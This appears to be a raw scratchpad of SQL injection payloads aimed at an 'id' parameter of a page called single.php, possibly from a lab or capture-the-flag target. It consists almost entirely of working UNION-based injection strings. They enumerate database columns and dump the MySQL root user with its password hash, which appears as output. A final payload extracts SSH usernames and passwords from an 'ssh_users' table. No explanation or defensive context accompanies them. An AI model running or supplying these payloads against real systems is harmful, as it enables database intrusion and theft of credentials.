GET /single.php?id=

1 AND 1=2 UNION ALL SELECT 1,2,3,4,(SELECT CONCAT(IFNULL(CAST(user AS NCHAR),0x20),0x636478727861,IFNULL(CAST(authentication_string AS NCHAR),0x20)) FROM mysql.user LIMIT 0,1),6,7,8-- -



UNION select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8 FROM information_schema.columns limit 856,1--
>>mysql:user:User

UNION select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8 FROM information_schema.columns limit 895,1--
>>mysql:user:authentication_string

UNION select 1,concat(user,0x3a,authentication_string),3,4,5,6,7,8 FROM mysql.user limit 0,1--
>>root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B





UNION select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 FROM information_schema.columns


UNION select 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9 FROM ssh.ssh_users;#
